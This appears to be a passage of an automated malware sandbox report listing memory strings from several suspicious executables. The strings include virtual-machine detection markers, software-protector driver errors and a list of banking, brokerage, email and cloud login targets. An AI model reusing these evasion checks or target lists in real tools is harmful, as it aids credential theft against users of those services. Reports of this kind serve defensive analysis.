Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: vmware
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: RoamingCFCGIIEHIE.exe, RoamingCFCGIIEHIE.exe, 00000005.00000002.2234128926.000000000054C000.00000040.00000001.01000000.00000009.sdmp, userAKKKFBGDHJ.exe, userAKKKFBGDHJ.exe, 00000008.00000002.2311861747.000000000022E000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, explorti.exe, 00000009.00000002.2272766960.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000A.00000002.2271816286.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 00000010.00000002.2340574498.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000012.00000002.3243966824.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3244272627.000000000058C000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Hyper-V (guest)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: 624f4d727e.exe, 00000018.00000002.2899758965.00000000025D2000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareo[
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.0000000000516000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.0000000000516000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ~VirtualMachineTypes
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.0000000000516000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.0000000000516000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.0000000000516000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.0000000000516000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: RoamingCFCGIIEHIE.exe, 00000005.00000002.2234128926.000000000054C000.00000040.00000001.01000000.00000009.sdmp, userAKKKFBGDHJ.exe, 00000008.00000002.2311861747.000000000022E000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, 00000009.00000002.2272766960.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000A.00000002.2271816286.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 00000010.00000002.2340574498.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000012.00000002.3243966824.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3244272627.000000000058C000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000012.00000002.3256607765.0000000001248000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3258303084.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000014.00000002.2765136724.0000000002587000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.000000000264F000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: firefox.exe, 0000001E.00000002.3033402856.00000270D62A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: firefox.exe, 0000001E.00000003.2957174991.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC6A2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: 624f4d727e.exe, 00000018.00000002.2899758965.00000000025D2000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
